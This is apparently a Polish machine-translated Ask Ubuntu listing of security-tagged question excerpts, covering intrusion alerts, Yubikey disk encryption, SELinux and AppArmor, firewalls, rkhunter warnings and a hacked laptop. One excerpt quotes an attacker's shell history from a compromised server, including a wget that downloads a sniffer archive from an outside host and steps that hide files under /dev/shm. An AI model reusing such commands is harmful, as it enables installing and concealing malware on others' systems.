Pytania otagowane jako security

Bezpieczeństwo obejmuje szeroki zakres tematów, w tym użytkowników, uprawnienia, uwierzytelnianie, autoryzację, aktualizacje, zaporę ogniową, hartowanie itp.

3
Jaka konfiguracja automatycznego powiadamiania / wykrywania włamań jest dobra do użytku na komputerze stacjonarnym?
Używam Linuksa od dłuższego czasu i zawsze czuję potrzebę posiadania pasywnej konfiguracji oprogramowania / skryptu, która może ostrzegać mnie o wszelkich podejrzanych działaniach sieciowych, takich jak skanowanie, nieudane próby logowania itp. W locie za pośrednictwem poczty elektronicznej lub przez powiadomienia wizualne / audio. Wiem, jak przeglądać dzienniki i inne rzeczy, …


2
Uwierzytelnianie dwuetapowe Yubikey Szyfrowanie całego dysku za pomocą LUKS
Niedawno kupiłem Yubikey Neo - sprytne małe sprzętowe urządzenie do uwierzytelniania drugiego czynnika. Jest przeznaczony przede wszystkim do używania z hasłami jednorazowymi i nowym protokołem U2F - ale od wersji 2 Yubikey obsługuje także uwierzytelnianie typu wyzwanie-odpowiedź HMAC-SHA1. HMAC-SHA1 łączy tajny klucz (przechowywany w Yubikey) i łączy go z hasłem, …

2
Czy to zły pomysł na jednoczesne uruchamianie SELinux i AppArmor?
Moja polityka korporacyjna mówi, że skrzynki Linux muszą być zabezpieczone przy pomocy SELinux (aby audytor bezpieczeństwa mógł zaznaczyć pole wyboru „tak, jesteśmy wyjątkowo bezpieczni!” Dla każdego serwera). Miałem nadzieję, że skorzystam z niesamowitego domyślnego bezpieczeństwa Ubuntu AppArmor. Czy nierozsądne jest uruchamianie zarówno Apparmor, jak i SELinux? (Jeśli tak, czy ten …

6
Komputer osobisty zaatakowany przez hakera: Jak zablokować ponowne logowanie tego użytkownika? Jak mogę się dowiedzieć, jak się logują?
Jestem 99,9% pewien, że mój system na moim komputerze osobistym został infiltrowany. Pozwólcie, że najpierw przedstawię uzasadnienie, aby sytuacja była jasna: Szorstki harmonogram podejrzanych działań i podjętych później działań: 4-26 23:00 Zakończyłem wszystkie programy i zamknąłem laptopa. 4-27 12:00 Otworzyłem laptopa po tym, jak był w trybie zawieszenia przez około …


5
Jak ważne jest hasło sudo?
Wiem, że hasło sudo chroni komputer przed lokalnym włamaniem przez osobę mającą do niego fizyczny dostęp ( edytuj: w rzeczywistości tak nie jest ). Moje hasło jest wystarczająco silne do tego celu, ale wiem, że nie jest wystarczająco silne, jeśli ktoś może zdalnie go wymusić. Czy ktoś może uzyskać dostęp …


5
Czy jest zainstalowany fabrycznie lub automatyczny firewall?
Czy Ubuntu jest wyposażony w preinstalowaną lub automatyczną zaporę ogniową? Jeśli nie, czy go potrzebuję? Przeczytałem kilka artykułów na temat przewagi Linuksa nad innymi systemami operacyjnymi pod względem bezpieczeństwa (nie trzeba mieć antywirusa, ...), ale chciałbym się upewnić.

1
ostrzeżenie rkhunter o /etc/.java /etc/.udev /etc/.initramfs
Używam Ubuntu 10.04.1 LTS. Używam rkhunter aby sprawdzić rootkitów. rkhunter narzeka na następujące ukryte pliki i katalogi. Myślę, że te pliki nie stanowią prawdziwego problemu w moim systemie, ale jak mogę sprawdzić, czy są to prawidłowe pliki? [07:57:45] Checking for hidden files and directories [ Warning ] [07:57:45] Warning: Hidden …

2
Znaleziono SSH Backdoor na VServer. Co robić?
Wczoraj sprawdziłem historię poleceń na moim VServerie. Znalazłem kilka podejrzanych linii. 195 wget aridan.hol.es/sniffer.tgz 196 tar xvf sniffer.tgz 197 ls -a 198 rm -rf sniffer.tgz 199 rm -rf .sniff/ 200 cd /dev/shm 201 ls -a 202 mkdir " . " 203 ls -a 204 cd " . "/ 205 wget …
24 ssh  security  malware 

2
Czy aktualizacja meta-release (do-release-upgrade) jest bezpieczna?
Próbuję zrozumieć do-release-upgradeproces, tj. Sposób, w jaki Ubuntu zachęca mnie do aktualizacji do następnej wiosennej lub jesiennej wersji Ubuntu. Po przeczytaniu źródeł ubuntu-release-upgraderznalazłem plik / etc / update-manager / meta-release w moim systemie. Wygląda na to, że ten plik używa adresu URL HTTP, aby wskazać http://changelogs.ubuntu.com/meta-release, gdzie znajdują się różne …


2
W jaki sposób system jest bezpieczny?
Rozumiem, że jeśli jakiekolwiek złośliwe oprogramowanie przedostanie się do systemu Linux, uzyska co najwyżej uprawnienia na poziomie użytkownika i zniszczy wszystko, co znajduje się w zasięgu konkretnego użytkownika, tj. Własne pliki użytkownika. Ale co dokładnie powstrzymuje złośliwe oprogramowanie przed dostępem na poziomie root? Czy to nie może złamać hasła od …
24 security 


Korzystając z naszej strony potwierdzasz, że przeczytałeś(-aś) i rozumiesz nasze zasady używania plików cookie i zasady ochrony prywatności.
Licensed under cc by-sa 3.0 with attribution required.